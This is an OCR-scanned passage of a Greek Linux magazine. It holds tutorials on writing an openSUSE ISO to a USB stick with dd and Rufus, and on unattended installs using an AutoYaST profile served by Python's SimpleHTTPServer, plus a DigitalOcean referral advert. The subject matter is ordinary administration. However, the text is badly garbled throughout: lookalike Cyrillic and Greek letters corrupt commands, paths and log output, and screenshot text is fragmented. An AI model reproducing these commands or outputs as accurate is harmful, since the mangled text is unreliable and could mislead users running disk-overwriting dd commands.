holmavik kernel: usb 2 

2 

2 

9 


1 
1: Мем USB device found, idVendor=0781, idProduct=5412 
1: New USB device strings: МҒг-1, Product=2, SerialNumber=3 
1: Product: Cruzer Fleur 
holmavik kernel: usb 1 
holmavik kernel: usb 1 
та1 07 14:37:33 holmavik mtp-probe[2190] : 
/0000:02:03.0/usb2/2-1" 
í 07 14:37:33 holmavik mtp-probe[2190]: bus: 2, device: 2 was not an MTP device 
í 07 14:37:33 holmavik kernel: usb-storage 2-1:1.0: USB Mass Storage device detected 
í 07 14:37:33 holmavik kernel: scsi host33: usb-storage 2-1:1.0 
í 07 14:37:33 holmavik kernel: usbcore: registered new interface driver usb-storage 
í 07 14:37:33 holmavik kernel: usbcore: registered new interface driver uas 
í 07 14:37:35 holmavik kernel: scsi 33:0:0:0: Direct-Access SanDisk Cruzer Fleur 4.05 PQ: © AN 
:2 
1 07 14:37:35 holmavik kernel: sd 33:0:0:0: Attached scsi generic sgl type 0 
í 07 14:37:35 holmavik kernel: sd 1:0: : 16041613 512-Ьу+е logical blocks: (8.21 6В/7.65 GiB) 


: Manufacturer: SanDisk Corporation 
: SerialNumber: 0000167C87723417 
checking bus 2, device 2: "/sys/devices/pci0000:00/0000:00:11.0 


14:37:35 holmavik kernel: sd : : Write Protect is off 


14:37:35 holmavik kernel: sd 10: : Моде Sense: 03 00 00 00 

14:37: holmavik kernel: sd : : Мо Caching mode page found 

14:37: holmavik kernel: sd 33:0:0:0: [sdb] Assuming drive cache: write through 

14:37: holma с sdb: 5451 ѕаь2 

4:37: Һо1тауік kernel: sd 33:0:0:0: [sdb] Attached SCSI removable dis 

14:37:35 holmavik kernel: SFW2-INext-DROP-DEFLT IN=eth0 OUT= ій 

:5Ьс8 DST=ff02:0000:0000:0000:0000:0000:0000:00fb LEN=8 
SPT=5353 DPT=5353 LEN=47 
πα! 07 14:39:43 holmavik kernel: SFW2-INext-DROP-DEFLT I Κι εδώ έχουµε το device file του [56 stick, 
f:fe2b:5bc8 05Т=ҒҒ02:0000:0000:0000:0000:0000:0000:00ҒЬ А а 
5РТ-5353 DPT=5353 LEN=47 στην ἔξοδο του journalctl -l -f 


Σε διανομές Linux που βασίζονται στο Systemd, σε ένα τερματικό μπορούμε να πληκτρολογήσουµε ѕуѕіетсі! -l -f (ue 
δικαιώµατα διαχειριστή) κι αµέσως 0” αρχίσουμε να βλέπουμε ζωντανά та logs του συστήµατος. Συνδέοντας στον 
υπολογιστή то USB stick, στο τερματικό θα εμφανιστεί το device file του. 


Αφού μάθουμε το device Ше του USB stick, γράφουμε πάνω του то ISO image με 
χρήση του εργαλείου dd. Πιο συγκεκριµένα, µε δικαιώµατα διαχειριστή συστήµατος 
πληκτρολογούμε κάτι σαν 


dd if=/home/cvar/Sóttar\ 5Ккгаг/ореп505Е-Іеар-42.2-рҮр-х86 64.150 of=/dev/sdb 
bs=4M status=progress && sync 


Αναλυτικότερα: Στην παράμετρο if õivoupe την πλήρη διαδρομή του ISO image, στην 
παράμετρο of δίνουμε την πλήρη διαδρομή του device file του USB stick, ενώ µε την 
παράμετρο bs ζητάμε η ανάγνωση και η εγγραφή δεδοµένων να γίνεται σε τμήματα 
των 4 megabytes. Με αυτό το ѕїаїиѕ=ргодгеѕ5, εξάλλου, λέμε ото dd να µας δεί- 
χνει στο τερματικό την πρόοδο της διαδικασίας εγγραφής. Με την παράμετρο sync, 
τέλος, βεβαιωνόμαστε ότι δεν θα υπάρχουν δεδοµένα στην cache που δεν έχουν 
ακόµη γραφτεί στο USB stick, οπότε µετά την εγγραφή του ISO αν θέλουμε θα ano- 
συνδέσουµε το στικάκι χωρίς καθυστέρηση. 
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Πώς γράφουμε αρχεία ISO σε USB sticks, από οποιοδήποτε λειτουργικό σύστημα 


суагФһойтауіс- τος 
File Edit Мем Search Terminal Help 


cvar@hólmavík:~> 

cvar@hólmavík:~> sudo dd if=/home/cvar/Sóttar\ skrár/openSUSE-Leap-42.2-DVD-x86_64.iso of=/dev/sdb bs=4M status=progress && sync 
4378853376 bytes (4,4 GB, 4,1 GiB) copied, 506,143 s, 8,7 MB/s 

1045+1 records in 

1045+1 records out 

4384096256 bytes (4,4 GB, 4,1 GiB) copied, 532,01 s, 8,2 MB/s 

cvar@hólmaviík:~> 


Εγγραφή του ISO image (του openSUSE Leap 42.2) σε USB stick κατάλληλης χωρητικότητας, µε τη βοήθεια του εργαλείου dd. 


Εργασία από macOS 


Στο macOS δουλεύουμε όπως περίπου και στο Linux, δηλαδή από ένα παράθυρο 
τερματικού και µε τη βοήθεια του εργαλείου да. Υπάρχουν όµως και κάποιες δια- 
φορές, T.X, στον τρόπο εντοπισμού του device file που αντιστοιχεί στο USB stick. 
Δείτε τα τρία screenshots που ακολουθούν, διαβάστε βεβαίως και тіс αντίστοιχες 


περιγραφές. 


еее A cvar — -bash — ttys000 — 105x30 — 31 
Imbpr15:~ cvar$ 

[mbpr15:~ cvar$ diskutil list 

/dev/disk0 (internal, physical): 


т ТҮРЕ МАМЕ 512Е IDENTIFIER 
(с) GUID_partition_scheme x500.3 GB 415Κθ 

1 ΕΕΙ ΕΕΙ 209.7 МВ 915К051 

2; Apple_CoreStorage Macintosh HD 499.4 GB disk0s2 

3 Apple_Boot Recovery HD 650.0 MB 915К053 


/dev/disk1 (internal, virtual): 
#: ТҮРЕ МАМЕ SIZE IDENTIFIER 
0: Apple_HFS ΜΒΡΓΙ5 +499.1 GB disk1 
Logical Volume on 415К052 
BDA211BD-9E96-49C7-B4FA-76595AEAB9C8 
Unencrypted 


/dev/disk2 (external, physical): 
т: ТҮРЕ IDENTIFIER 


0: FDisk_partition_scheme disk2 
1: р05 ҒАТ 32 U disk2s1 


пьрғ15:- cvar$ I 


Συνδέουµε To USB stick στον υπολογιστή και σε éva παράθυρο τερματικού πληκτρολογούµε diskutil list, ώστε να δούμε та 
device files όλων” των αποθηκευτικών µέσων που βλέπει то macOS. Στο παράδειγμά µας, то device file του stick είναι то / 
dev/disk2. Ένας τρόπος προκειµένου να είμαστε βέβαιοι πως κοιτάζουµε то σωστό device file, είναι να λαμβάνουμε υπόψη 
το μέγεθος του USB stick. Το δικό µας έχει μέγεθος 8GB οπότε, ναι, το device file που θέλουμε είναι то /dev/disk2. 


еее Æ cvar — -bash — 4у5000-- 105x30 — 361 
Ітірг15:“ cvar$ 

Imbpr15:~ cvar$ diskutil unmountDisk /dev/disk2 

Unmount of all volumes on disk2 was successful 

mbpr15:~ cvar$ | 


Πριν προχωρήσουμε στην εγγραφή του ISO αποπροσαρτούµε то USB stick, πληκτρολογώντας diskutil unmountDisk /dev/ 
disk2. Βεβαίως, στη θέση του /dev/disk2 εσείς θα βάλετε то devife Не για το δικό сас στικάκι. 
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9989 ΘῚ суаг-- -bash — ttys000 — 105x30 — 381 

mbpr15:~ cvar$ 

mbpr15:~ cvar$ sudo dd if=~/Downloads/openSUSE\ Leap\ 42.2\ DVD-x86_64.iso of=/dev/rdisk2 bs=4m 
ІРаѕѕмога: 

1045+1 гесогӣѕ іп 

1045+1 records out 

4384096256 bytes transferred in 494.012465 secs (8874465 bytes/sec) 

mbpr15:~ cvar$ 8 


Και perá την αποπροσάρτηση тоо USB stick ξεκινάμε την εγγραφή του ISO image, µε τη βοήθεια του dd. Είναι φανερό ότι 
στην παράμετρο if δίνουμε το πλήρες path προς το αρχείο ISO, στην παράμετρο of δίνουμε το (πλήρες) όνομα του device 
file που αντιστοιχεί στο USB stick, ενώ µε την παράμετρο bs ζητάμε η ανάγνωση και η εγγραφή δεδοµένων να γίνεται σε 
τμήματα των 4 megabytes. Οι προσεκτικοί Ва διαμαρτύρεστε ήδη: αντί για "disk2”" έχουµε πληκτρολογήσει гаіѕК2. Αυτό то 
"r" προέρχεται anró то "гаи" και στην περίπτωσή µας σημαίνει ότι η εγγραφή επί του USB stick πραγματοποιείται ταχύτερα. 


Εργασία από Windows 


Ένας τρόπος για να γράφουμε ISO images σε USB sticks κάτω апо Windows, sí- 
ναι µε τη βοήθεια της εφαρμογής Rufus (https://rufus.akeo.ie). Δείτε τα τέσσερα 
screenshots που ακολουθούν, διαβάστε και тіс αντίστοιχες περιγραφές. 


P Rufus 214108 
Device 
ΝΟ ΙΑΒΕΙ (Е: [8GB] 47 Open 


Partition scheme and target system type M 4 > Christos Маге... > Downloads ν Ὁ Search Downloads 
MBR partition scheme for BIOS or UEFI 


Organize = Мем folder 


File system 
FAT32 (Defaut) 


А 


Ж Quick access 
Cluster size 


Е Pictures 
4096 bytes (Default) 
D Music - 
New volume label ΕΒ р, 
Е Documents 
95Ц5Е = ορεπϑ|/5Ε-1εορ" 


Е Videos 42.2-0ΝΏ-κθ6. 64. 
ΕΕ Desktop жу 


Format Options E7 
Check device for bad blocks |1 Pass 
Quick format у Downloads 
Create a bootable disk using FreeDOS 

Create extended label and icon files 


«4. OneDrive 


ШЕ This PC 
ΕΕ Desktop 


8 Documents 


ν 


File пате: 150 Image (7ізо) 


About... Log 


No image selected 


Τρέχουμε то Rufus και στη θυρίδα Device, στο βασικό παράθυρο της εφαρμογής, επιλέγουμε το drive letter που αντιστοιχεί 
στο USB stick (1). Κάνουμε ένα κλικ στο σχετικό εικονίδιο επιλογής αρχείων (2) κι αµέσως ανοίγει ένα παράθυρο του File 
Explorer των Windows. Απ’ αυτό εντοπίζουµε κι επιλέγουμε то ISO image που θέλουμε να γράψουμε ото USB stick (3) και 
φυσικά πατάμε στο κουμπί Open. 
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Πώς γράφουμε αρχεία ISO σε USB sticks, από οποιοδήποτε λειτουργικό σύστημα 


P Rufus 2.14.108 


Device 

NO_LABEL (Е: [8GB] 

Partition scheme and target system type 
MBR partition scheme for BIOS or UEFI 
File system 

FAT32 (Default) 

Cluster size 

4096 bytes (Default) 

New volume label 


0505Е 


Format Options 
Check device for bad blocks |1 Pass 


Quick format 


Create a bootable disk using | DD Image 


Create extended label and icon files 


WARNING: ALL DATA ON DEVICE 'NO_LABEL (E:) [8GB]' WILL BE 
DESTROYED. 
To continue with this operation, click OK. To quit click CANCEL. 


About... Log Start 


Using image: openSUSE-Leap-42.2-DVD-x86_64iso 3 


Τα υπάρχοντα δεδοµένα του USB stick πρόκειται να χαθούν! П' αυτό και το Rufus εμφανίζει παράθυρο µε σχετική 
προειδοποίηση, καλώντας µας να επιβεβαιώσουμµε την ενέργεια που πρόκειται να γίνει - ή βεβαίως να την ακυρώσουμε. 


47 Rufus 2.14.1086 


Device 

NO_LABEL (Е:) [86B] 

Partition scheme and target system type 

MBR partition scheme for BIOS or UEFI 

File system 

FAT32 (Default) 

Cluster size 

4096 bytes (Default) 

New volume label 

0505Е 

Format Options 
Check device for bad blocks |1 Pass 
Quick format 


Create a bootable disk using | DD Image 


Create extended label and icon files 


Writing image: 44.5% completed 


About... Log Start 


Using image: openSUSE-Leap-42.2-DVD-x86_64.iso 


H εγγραφή του ISO image επί тоо USB stick έχει ξεκινήσει κι εξελίσσεται орала. Την πρόοδο της διαδικασίας тп βλέπουμε 
στη σχετική μπάρα, κάτω. 
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47 Rufus 2.14.1086 


Device 
NO_LABEL [ΕΙ] [8GB] 
Partition scheme and target system type 
MBR partition scheme for BIOS or UEFI-CSM 
File system 
FAT32 (Default) 
Cluster size 
4096 bytes (Default) 
New volume label 
0505Е 


Format Options 57 
Check device for bad blocks 1 Pass 


Quick format 


Create a bootable disk using | DD Image 


Create extended label and icon files 


About... 


1 device found 


H επιτυχής ολοκλήρωση της εγγραφής δεν συνοδεύεται апд типпауокроосісс - αλλά ποιος νοιάζεται για τέτοια; Σημασία 
έχει ότι από το USB stick µπορείτε πλέον να ξεκινήστε την εγκατάσταση του άλλου σας αγαπημένου λειτουργικού. 
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πος 
DigitalOcean 


Ταχύτατα VPSes oto cloud, σε hosts ue δίσµους SSD. 
Επιβογή datacenter σε Ευρώπη, Арерікп ка! Ασία. 
| вап-тпеап control panel, για απόῆυτο έβεγχο. 


Αποητήστε τώρα το δικό oas VPS, 

στο cloud της Оідіќа[Осеап. 

Κάντε KAIK στο http://bit.ly/digocean10off 
και κερδίστε αυτομάτως 105 σε credit. 


Hint: Επιβέγοντας το µιμρό πϑάνο, 

πάντα με μῆιη στο http: /ΡΙΙ. ly/digocean1 бон, 
ουσιαστιµά έχετε δύο µήνες δωρεάν για ένα VPS 
µε 512MB RAM, 20GB SSD ка! ТТВ transfer. 


В Δεν είναι кі άσχημα 


Skill: Intermediate 
Tags: AutoYaST, YaST, openSUSE 


Αυτοματοποιηµένες 
εγκαταστάσεις 
µε το AutoYaST 


Είστε υπεύθυνος για την εγκατάσταση διανομής Linux σε όλους τους 
υπολογιστές ενός τοπικού δικτύου. Δεχτείτε παρακαλούμε τα συγχαρητήριά 
μας – και καλό σας κουράγιο. Κάθε γνήσιο деек σίγουρα χαίρεται όταν 
του δίνεται η ευκαιρία να χαρίσει ζωή σε µια μηχανή, ξεκινώντας µε την 
εγκατάσταση του Ο5. Τι γίνεται όµως όταν αντί για έναν ή δύο υπολογιστές 
έχουµε πέντε, δέκα ή ακόµη και περισσότερους; Ποιος µπορεί να αντέξει τόση 
χαρά, ειδικά όταν υπάρχει και deadline; 


Το πρόβλημα που μόλις περιγράψαµε έχει περισσότερες από μία λύσεις. Ίσως, π.χ., 
υπάρχει πρόσβαση σε PXE boot server, οπότε οι υπολογιστές του δικτύου ξεκινούν 
απ’ αυτόν φορτώνοντας το κατάλληλο ітаде και στη συνέχεια πραγματοποιείται 
η εγκατάσταση του λειτουργικού. Μια άλλη προσέγγιση είναι να ολοκληρωθεί η 
εγκατάσταση σε έναν µόνον υπολογιστή και µετά, µε κάποιον τρόπο, τα περιεχό- 
μενα του δίσκου να αντιγραφούν, bit προς bit, στους δίσκους των άλλων υπολογι- 
στών. Βεβαίως, η αντιγραφή θα χρειαστεί να γίνει µε τέτοιο τρόπο, ώστε µετά то 
πέρας της οι άλλοι υπολογιστές να εἶναι bootable. Σκεφτείτε επίσης ότι та µηχα- 
νήματα τα οποία πρόκειται να δεχτούν το νέο λειτουργικό θα στερούνται πρόσβα- 
σης στο δίκτυο. Θα πρέπει λοιπόν είτε να φορτώσουν πρώτα κάποιο μίνι-λειτουρ- 
γικό µε το κατάλληλο λογισμικό (εἰπε κανείς 'κλοουνζίλα"; (http://clonezilla.org)), 
είτε να έχουµε δίσκους που μεταφέρονται και συνδέονται σε εκείνον µε την ЕТОС- 
μη εγκατάσταση (αυτή τη φορά εἰμαστε 100% βέβαιοι ότι κάποιος εἰπε "ντι-ντι' 
(ћрѕ://1іпих.аіе.пеї/тап/1/аа)). 


Στο παρόν άρθρο παρουσιάζουµε µια εντελώς διαφορετική, εξαιρετικά ευέλικτη 
λύση, η οποία ούτε την παρουσία PXE boot server προὐποθέτει, ούτε περίτεχνες 
και χρονοβόρες αντιγραφές χρειάζεται. Μόνος περιορισμός είναι ότι αφορά σε 
εγκαταστάσεις openSUSE (https://www.opensuse.org) (ή SUSE Linux Enterprise 
(https://www.suse.com/products/server)). Από την άλλη, βέβαια, όταν αρχίζουμε va 
σκεφτόμαστε όλα -ή έστω μερικά ATÓ- τα μηχανήματα ενός τοπικού δικτύου, δύ- 
σκολα μπορούμε να φανταστούμε ότι. δεν... θα τρέχουν openSUSE :Р 
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Αυτοματοποιηµένες εγκαταστάσεις µε то AutoYaST 


Στο προκείµενο, μιλάμε για то AutoYaST: éva πανίσχυρο σύστηµα αυτόματης εγκα- 
τάστασης του openSUSE. Αναλυτικότερα, µε κάποιον τρόπο που θα δούμε σε λίγο 
δημιουργούμε éva AutoYaST profile. Αυτό беу είναι τίποτε περισσότερο апо ένα ap- 
χείο XML µε λεπτομερείς πληροφορίες εγκατάστασης και ρύθμισης. Апо τη στιγµή 
που έχουµε το AutoYaST profile µας, προχωράμε κανονικά µε την εγκατάσταση του 
openSUSE σε éva οποιοδήποτε μηχάνημα. Μόνο που στις παραμέτρους που περνάμε 
στον πυρήνα, επιλέγοντας το κατάλληλο entry ото μενού του GRUB, υποδεικνύουμε 
τη θέση του XML. Μετά η εγκατάσταση του openSUSE ξεκινά κι ολοκληρώνεται QAU- 
тӧрата - χωρίς επίβλεψη ή επεμβάσεις. 


Πα άλλη µια φορά, ο καλύτερος τρόπος προκειµένου να εκτιμήσετε το AutoYaST 
είναι να πειραματιστείτε, σε φυσικό ἡ σε εικονικό εργαστήριο. Στη συνέχεια δεί- 
χνουμε: 


• πώς φτιάχνουμε ένα AutoYaST profile αυτόματα και γρήγορα, ξεκινώντας από 
µια υπάρχουσα εγκατάσταση του openSUSE 


“ πώς τροφοδοτούμε, δικτυακά, το profile στον installer του openSUSE 


• τικάνουµε στις περιπτώσεις που то hardware ενός υπολογιστή διαφέρει από 
το hardware που περιγράφεται στο εκάστοτε AutoYaST profile 


Δείτε τα screenshots που ακολουθούν, διαβάστε βεβαίως και το συνοδευτικό κεί- 
μενο. 


Βήμα 1 | δηµιουργία AutoYaST profile 


Δουλεύουμε στο osuse0.colder.is, έναν υπολογιστή µε то openSUSE Leap ήδη εγκα- 
τεστημένο. Το σύστημα είναι προσβάσιμο από το τοπικό δίκτυο, οπότε οι άλλοι 
υπολογιστές, στους οποίους θα γίνουν αυτοματοποιηµένες εγκαταστάσεις, θα είναι 
σε θέση να διαβάσουν το AutoYaST profile δικτυακά, χωρίς δηλαδή να απαιτείται η 
μεταφορά/περιφορά του (π.χ. µε κάποιο USB stick). Περισσότερα επ’ αυτού σε λίγο. 


Φορτώνουμε λοιπόν то openSUSE Leap και ре то2уррег φροντίζουμε γιατην παρου- 
σία του πακέτου аџїоуаѕї2. Αυτό περιλαμβάνει το module του YaST για τη δημιουρ- 
yia και γενικά για τη διαχείριση AutoYaST profiles. 


Το module το ξεκινάμε φορτώνοντας то YaST Control Center και μεταβαίνοντας 
στην κατηγορία Miscellaneous (βλ. αριστερό, κάθετο πλαίσιο). Εκεί υπάρχουν δύο 
entries σχετικά µε το AutoYaST. Αυτό που µας ενδιαφέρει εἶναι το Autoinstallation 
Cloning System. Με κλικ πάνω του ξεκινά η διαδικασία δημιουργίας ενός AutoYaST 
profile, то οποίο αντικατοπτρίζει. επακριβώς. тіс επιλογές που κάναμε κατά την 
εγκατάσταση του συστήµατος. Αναλυτικότερα, αναφερόμαστε σε επιλογές περί 
filesystems, λογαριασμών χρηστών, δικτύωσης, bootloader κ.λπ. Επιπλέον, αν µετά 
την εγκατάσταση κάναμε πρόσθετες αλλαγές στο σύστημα, όπως, T.X, προσθήκη 
νέων λογαριασμών χρηστών, οι σχετικές πληροφορίες θα συμπεριληφθούν στο 
υπό δηµιουργία profile. 
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VHA@KER 


Activities Œ] Terminal ~ Wed 18:35 


user@osuse0:~ 


File Edit View Search Terminal Help 


иѕегвоѕиѕеб: ~> 
иѕегёоѕиѕеб:-> гуррег зе aŭtoyast 
Loading repository data... 


Reading installed pac 


S | Name 


Summar | Type 


| autoyast2 | - Automated Installation | package 
| autoyast2 | - Automated Installation | srcpackage 
i | autoyast2-installation | YaST2 - Auto Installation Modules | package 


useręosuse0:~> sudo zypper -n in autoyast2 
root's password 


repository dat: 
installed pack 


lowing 2 NEW packages are going to be installed 


utoyast2 yast2-schema 


2 new 
verall download size: 

used 

Continue? [y/n/. 
Retrieving 
Retrievin 
Retrievi 


1 KiB. Already cached: 0 B. After the operation, additional 2.1 MiB will Бе 


? shows all options] (y): y 
а-3.1.8-1.11. 


а5%2-5с! 
уав%2-всһепа-3.1. 
g package аџїоуаѕї2-3. 
Retrieving: autoyast2-3.1. 1 
Checking for file conflicts: . 
(1/2) Installing: yast2-schema-3. 
2/2) Installing: autoyast2-3.1.154 
Additional rpm output: 

Updating /etc/sysconfig/autoinstall. .. 


_64.rpm . 
3.1.поагсһ 
.noarch. rpm 


. [done] 
. [done] 


1.11.х86. 64 
.noarch 


иѕегаоѕиѕеб: 


Αναζητούμε κάποιο πακέτο που ονομάζεται "autoyast" ή κάπως έτσι (1). Το εντοπίζουµε, ονομάζεται "аиїоуаѕі2", και то 
εγκαθιστούµε αμέσως (2). 


Activities  y2controlcenter v Wed 18:37 


YaST Control Center @ osuse0 


Search User Logon Management ών, VPN Gateway апа Clients 


В Software Г 
[E Widows Domain Membership sg ISCSI Initiator 
ШЕ Haraware 
Ей System Security and Users 
Ға [Security апа Users | 
ШЕ AppArmor Configuration Firewall 


(2) Network Services 


Security and Users 
Security Center and Hardening {8 5υάο 


) Virtualization 


Support Ё User and Group Management 
Ἂς Miscellaneous 
Virtualization 
ЕГ | Е | = 
Install Нурегуіѕог апа Tools Relocation Server Configuration 
Support 


/ [ff Release Notes 


Miscellaneous 


[ο Autoinstaltation Cloning System 


Creating AutoYaST configuration file 


EA Snapper ЕЕ system Log 


Б Autoinstallation Configuration 


Systemd Journal C lb Vendor Driver CD 


Στο YaST Control Center πηγαίνουμε στην κατηγορία Miscallaneous και κάνουμε ένα κλικ στο Autoinstallation Cloning 
System. Σε πολύ λίγο Ва έχουµε ένα AutoYaST profile που θα αντικατοπτρίζει την παρούσα εγκατάσταση. 
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Activities ІФ YaST2 ~ Wed 18:38 


Search (С User Logon Management мч Gateway and Clients 
Ш ње 
В ао Domain Membership iSCSI Initiator 
ШІ Haraware 
Ед system Security and Users 
S P sm 
ἂν Network Services FE! AppArmor Configuration ЕТІ Firewall 
7) Security and Users т 
У Security Center апа Hardening $} sudo 
ШЕ Virtuauization 
AA 
(E) Support Ф User and Group Management 
Ἂς Miscellaneous 
Virtualization Υα5Τ2 


ΤΕ Install Нурегиѕог апа Tools 
Cloning the system... 


[Support | Theresulting autoyast profile can be found in /root/autoinst.xml. 


(E Retease notes 
Miscellaneous 


(P Autoinstattation Cloning System (J Autoinstatlation Configuration 


[3 snapper B system Log 


W systema Journal CTh vendor Driver СО 


Το μήνυμα 'Cloning the system...' μοιάζει παραπλανητικό, αφού δεν λαμβάνει χώρα κάποια κλωνοποίηση του συστήµατος, 
TLX., µε τη µορφή αντιγραφής. Δημιουργείται όµως ένα АиоҮа5Т profile, το οποίο αν χρησιμοποιήσουμε κατά την 
εγκατάσταση του openSUSE σε άλλο μηχάνημα τότε θα καταλήξουμε µε ένα σύστηµα εντελώς παρόμοιο µε αυτό που тора 
έχουμε. 


Το AutoYaST profile δημιουργείται αυτόματα κι αποθηκεύεται στο αρχείο autoinst. 
xml, εντός του καταλόγου /γοοῖ. Ίσως θέλουμε να το μεταφέρουμε σε κάποιον πε- 
ρισσότερο βολικό κατάλογο, ίσως κι όχι. 


Το θέµα µας τώρα εἰναι ότι χρειάζεται να καταστήσουµε το autoinst.xml διαθέσι- 
ро σε άλλους υπολογιστές του τοπικού δικτύου. Μπορούμε να καταφύγουµε στον 
Apache, στον nginx ή σε οποιονδήποτε άλλο мер server. Ίσως όµως να µην έχουµε 
έναν ολόκληρο διακομιστή ιστοσελίδων διαθέσιμο - και για να λέμε τα πράγματα 
ШЕТ буора τους μάλλον ба ήταν υπερβολικό να επιστρατεύσουµε κάποιον µόνο και 
μόνο για το ταπεινό autoinst.xml. Ευτυχώς που εἶναι προεγκατεστηµένη η Python, 
η οποία διαθέτει éva module που λειτουργεί ως мер server. Από ένα τερματικό, λοι- 
πόν, µεταβαίνουμε στον κατάλογο του autoinst.xml και πληκτρολογούμε 


python -m SimpleHTTPServer 


Ττότε,όλαταπεριεχόμενατουκαταλόγουθαείἰναιδιαθἐσιμαμέσωΗΤΤΡκαισυγκεκρι- 
μένα από τη διεύθυνση http://suse0.colder.is:8000 (Εξ ορισμού, о SimpleHTTPServer 
ακούει για αιτήσεις πελατών апо το port 8000/ΤΟΡ). Φυσικά, ау беу υπάρχει FQDN 
(στο παράδειγμά µας είναι το зиѕе0.со!аегіѕ) τότε στη θέση του θα είναι αρκετό 
να βάλουμε τη διεύθυνση ΙΡ του μηχανήματος (192.168.193.243, πάντα για την περί- 
πτωσή μας). 
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иѕег@оѕиѕе0:- х 


File Edit Мем Search Terminal Help 

user@osuse0:~> 

user@osuse0:~> sudo ср /root/autoinst.xml .. 
root's password: 

user@osuse0:~> ls -lh 


total 96K 

ττν-γ--Γ-- 1 root root 55K Jul 5 18:41 autoinst.xml 
drwxr-xr-x 2 user users 4.0K Jul 5 18:11 bin 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Desktop 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Documents 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Downloads 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Music 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Pictures 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Public 
drwxr-xr-x 2 user users 4.0K Jul 5 18:11 public_html 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Templates 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Videos 


ивег(ао5иве0:-> 

иѕег@оѕиѕеб:~> hostname -f 
osuse0.colder.is 

userę@osuse0:~> 

useręosuse0:~> python -m SimpleHTTPServer 
Serving HTTP on 0.0.0.0 port 8000 


Н χρήση ενός κανονικού, full featured διακομιστή ιστοσελίδων όπως είναι o Apache ή o nginx, μάλλον αποτελεί υπερβολή 
για то σερβίρισµα του autoinst.xml. П' αυτό κι αντιγράφουµε το αρχείο XML στον προσωπικό κατάλογο του χρήστη µας και 
φορτώνουµε το ЅітріеНТТРЅегуег module της Python. 


Үа5Т2 х 


Firewall Configuration: Summary 


Firewall Starting 


e Enable firewall automatic starting 
e Firewall starts after the configuration has been written 


Internal Zone 


e No interfaces assigned to this zone. 


Demilitarized Zone 
e No interfaces assigned to this zone. 
External Zone 


Interfaces 


• eth0 


Open Services, Ports, and Protocols 


e Secure Shell Server 
9 TCP Ports: 8000 


[L] Show Details 


| Hep | ( Cancel || Back || Finish | 


То module ονόματι ЗітріеНТТР5егуег της Python εξ ορισμού χρησιμοποιεί то port 8000/ТСР. Ау στο σύστημά µας то 
firewall είναι ενεργοποιημένο, φροντίζουμε ώστε να επιτρέπονται οι εισερχόµενες συνδέσεις στο προαναφερθέν port. 
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Σηµείωση. Αν έχουµε то firewall ενεργοποιημένο, στο σηµείο αυτό οφείλουμε να 
φροντίσουμε ὠστε οι συνδέσεις ото рогі 8000/ТСР να επιτρέπονται апо hosts 
του λεγόμενου External Zone = µ άλλα λόγια опо μηχανήματα του τοπικού δικτύ- 
ου. Н ρύθμιση του firewall γίνεται πανεύκολα µε τη βοήθεια του YaST και συγκε- 
крема χάρη στο module ονόματι firewall. 


Βήμα 2 | αυτόµατη εγκατάσταση µε χρήση AutoYaST profile 


Πηγαίνουμε τώρα σε έναν άλλον υπολογιστή και ξεκινάμε την εγκατάσταση του 
openSUSE, апо DVD ή USB stick. Στην πρώτη οθόνη του installer, µε τα βελάκια του 
δρομέα μετακινούμαστε πάνω апо το entry µε буора Installation αλλά... беу. πατά- 
µε το [Enter]. Πρώτα, στη θυρίδα Boot Options πληκτρολογούμε 


autoyast2=http://osuse0.colder.is:8000/autoinst.xml 


Φυσικά, στη θέση του osuse0.colder.is εσείς θα βάλετε το κατάλληλο FQDN ή την 
κατάλληλη διεύθυνση ΙΡ. Επίσης, αν ο απομακρυσμένος мер server χρησιμοποιεί то 
τυπικό port (80/ТСР), τότε θα παραλείψετε αυτό то "8000" 


Boot from Нага Disk 
Installation 
Upgrade 


More ... 


Boot Options autoyast2=http://osuse0.colder.is:8000/autoinst.xml 


F1 Help F2 Language F3 Video Mode F4 Source F5 Kernel F6 Driver 
English (US) 1440 x 900 DVD Default No 


Πριν ακόµη φορτώσουμε Tov installer για την εγκατάσταση Tou openSUSE Leap σε κάποιον ἄλλον υπολογιστή, µε την 
εικονιζόµενη οδηγία φροντίζουμε ώστε να διαβαστεί το AutoYaST profile που δημιουργήσαμε προηγουμένως. Κατ’ αυτόν τον 
τρόπο η νέα εγκατάσταση θα πραγµατοποιηθεί αυτόματα και χωρίς каша παρέμβαση από μέρους µας. 
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УНАФОКЕК 


Αφού βεβαιωθούμε ότι беу έχουµε κάνει κάποιο λάθος πληκτρολόγησης, πατάμε 
το [Enter] και η διαδικασία της αυτόματης εγκατάστασης ξεκινά. Ίσως δεν προλά- 
βετε να δείτε το μήνυμα που φανερώνει ότι το αρχείο autoinst.xml διαβάστηκε. Θα 
το καταλάβετε όµως αν ρίξετε µια ματιά στο τερματικό απ’ όπου ξεκινήσατε το 
SimpleHTTPServer module της Python -- ή στο log file του мер server που χρησιμο- 
ποιείτε, τέλος πάντων. 


tivities [5] Terminal = 


user@osuse0:~ x 


File Edit View Search Terminal Help 
иѕег@оѕиѕеб: ~> 

userę@osuse0:~> sudo ср /root/autoinst.xml . 
root's password: 

чѕег@оѕиѕеб:~> ls -lh 


total 96K 

=rw-r--r-- 1 root root 55K Jul 5 18:41 autoinst.xml 
drwxr-xr-x 2 user users 4.0K Jul 5 18:11 bin 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Desktop 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Documents 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Downloads 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Music 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Pictures 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Public 
drwxr-xr-x 2 user users 4.0K Jul 5 18:11 public_html 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Templates 
drwxr-xr-x 2 user users 4.0K Jul 5 18:27 Videos 


иѕег@оѕиѕеб: ~> 

user@osuse0:~> hostname -f 

osuse0.colder.is 

изег(ао5и5е0:-> 

иѕег@оѕиѕеб:~> python -m 5ΊπΡΙΘΗΤΤΡΞΕΓΝΕΓ 

Serving НТТР оп 0.0.0.0 port 8000 ... 

